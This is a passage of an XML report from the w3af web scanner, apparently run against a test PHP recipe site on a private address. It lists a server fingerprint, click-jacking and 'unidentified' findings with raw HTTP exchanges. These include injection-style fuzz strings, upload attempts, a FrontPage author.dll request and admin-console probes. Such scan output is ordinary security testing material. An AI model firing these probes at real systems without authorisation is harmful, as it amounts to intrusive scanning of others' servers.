    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="663">
                <httprequest>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="684">
                <httprequest>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="714">
                <httprequest>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="728">
                <httprequest>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[252, 270, 298]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <http-transactions>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/6bBCX4LD HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 6bBCX4LD has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='6bBCX4LD'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="298">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[252, 270, 333]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.43:31337/" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <http-transactions>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/6bBCX4LD HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 6bBCX4LD has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='6bBCX4LD'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[16, 46, 101, 105, 108, 131, 137, 174, 202, 203, 204, 205, 206, 207, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 232, 233, 235, 236, 237, 238, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 253, 258, 260, 268, 270, 271, 291, 292, 294, 295, 296, 298, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 316, 318, 319, 320, 322, 323, 328, 329, 330, 331, 332, 334, 335, 336, 337, 338, 339, 340, 343, 344, 345, 346, 347, 349, 350, 352, 353, 355, 356, 357, 358, 361, 363, 364, 365, 366, 369, 371, 372, 373, 376, 381, 385, 387, 389, 406, 423, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 436, 437, 439, 440, 441, 442, 444, 445, 447, 448, 449, 450, 453, 454, 455, 456, 460, 463, 465, 468, 479, 489, 504, 509, 514, 522, 525, 527, 534, 535, 539, 541, 542, 543, 544, 545, 547, 548, 555, 556, 563, 583, 598, 618, 643, 647, 662, 675, 682, 683, 685, 690, 697, 711, 712, 720, 723, 724, 730, 731, 742, 744, 748, 751, 752, 757, 765, 766, 768, 771, 782, 787, 798, 802, 815, 818, 831, 835, 847, 850, 861, 873]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="46">
                <httprequest>
                    <status>PUT http://10.12.68.43:31337/uszzY HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">lPRhA7</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about uszzY has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='uszzY'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="101">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="105">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="108">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/qArmO.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/qArmO.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="131">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="137">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3FBcm1PLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguT21yQXE=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="202">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="205">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
